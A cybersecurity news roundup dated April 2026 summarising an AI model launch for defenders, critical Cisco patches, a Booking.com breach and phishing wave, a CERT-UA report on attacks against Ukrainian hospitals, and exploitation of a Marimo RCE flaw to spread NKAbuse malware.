OpenAI Launches GPT-5.4-Cyber with Expanded Access for Security Teams
OpenAI unveiled GPT-5.4-Cyber this week, a variant of its flagship GPT-5.4 model specifically optimized for defensive cybersecurity use cases, arriving just days after Anthropic’s own controlled release of its Mythos frontier model as part of Project Glasswing. Alongside the model launch, OpenAI said it is scaling its Trusted Access for Cyber program to thousands of authenticated individual defenders and hundreds of teams responsible for securing critical software, with the goal of giving legitimate defenders a head start while simultaneously hardening safeguards against jailbreaks and adversarial prompt injections. The company also revealed that its AI-powered Codex Security application security agent has already contributed to over 3,000 critical and high-severity vulnerability fixes, framing its broader vision as shifting security from “episodic audits and static bug inventories to ongoing, tangible risk reduction.”
Cisco Patches Critical Vulnerabilities in Webex and Identity Services Engine
Cisco released patches for four critical-severity flaws spanning its Webex and Identity Services Engine products this week, with the most severe rated CVSS 9.9 and capable of enabling unauthenticated remote code execution. The Webex flaw (CVE-2026-20184, CVSS 9.8) stems from improper certificate validation in its SSO integration with Control Hub, allowing a remote attacker to impersonate any user within the service and gain unauthorized access. Two additional ISE flaws both carry CVSS scores of 9.9 and allow authenticated attackers with admin credentials to execute arbitrary code via crafted HTTP requests. Organizations running these products should prioritize patching immediately, particularly any deployments where administrative interfaces are internet-accessible.
Booking.com Breach Sparks Scam Wave Targeting Travelers’ Reservations
Booking.com began notifying customers this week that unauthorized third parties accessed reservation information tied to upcoming trips, with the company confirming it detected suspicious activity and immediately took steps to contain the issue — including resetting PINs on affected bookings. The breach has already triggered a wave of targeted phishing attacks, with affected customers reporting convincing fake emails, phone calls, and WhatsApp messages from actors claiming to be hotel staff or check-in managers, leveraging the stolen reservation details to add credibility to their scams. The full scope of the incident remains unclear, including how the breach occurred and whether any data has been exfiltrated for resale, but the combination of travel details, upcoming booking dates, and personal contact information makes the stolen data particularly effective for social engineering.
Ukraine’s CERT-UA Warns of UAC-0247 Campaign Targeting Clinics and Emergency Hospitals
Ukraine’s Computer Emergency Response Team disclosed a campaign by threat cluster UAC-0247 that has been targeting government entities and municipal healthcare facilities — including clinics and emergency hospitals — between March and April 2026, deploying malware designed to steal sensitive data from Chromium-based browsers and WhatsApp. The attack chain begins with a phishing email disguised as a humanitarian aid proposal, directing victims to either an AI-generated fake site or a legitimate site compromised via XSS, where a Windows Shortcut file triggers the malware download. The targeting of emergency medical infrastructure during an active conflict is particularly alarming, as disruptions to these systems carry direct risk to patient safety and emergency response capabilities.
Marimo RCE Exploit Now Deploys NKAbuse Malware Hosted on Hugging Face
Threat actors exploiting the critical Marimo pre-authentication RCE vulnerability (CVE-2026-39987) have escalated their attacks this week, now deploying a new variant of the NKAbuse malware hosted directly on Hugging Face Spaces — a tactic that abuses the AI platform’s trusted infrastructure to stage and deliver payloads while evading detection. NKAbuse is a Go-based malware that uses the NKN (New Kind of Network) blockchain-based peer-to-peer communications protocol for C2, making its traffic exceptionally difficult to block or monitor since it blends in with legitimate decentralized network activity. The combination of an actively exploited zero-auth RCE in a tool popular with data scientists and ML practitioners, paired with a blockchain C2 backdoor staged on a widely trusted AI platform, represents a significant escalation in this campaign’s sophistication.
The post InfoSec News Nuggets 04/17/2026 appeared first on AboutDFIR – The Definitive Compendium Project.
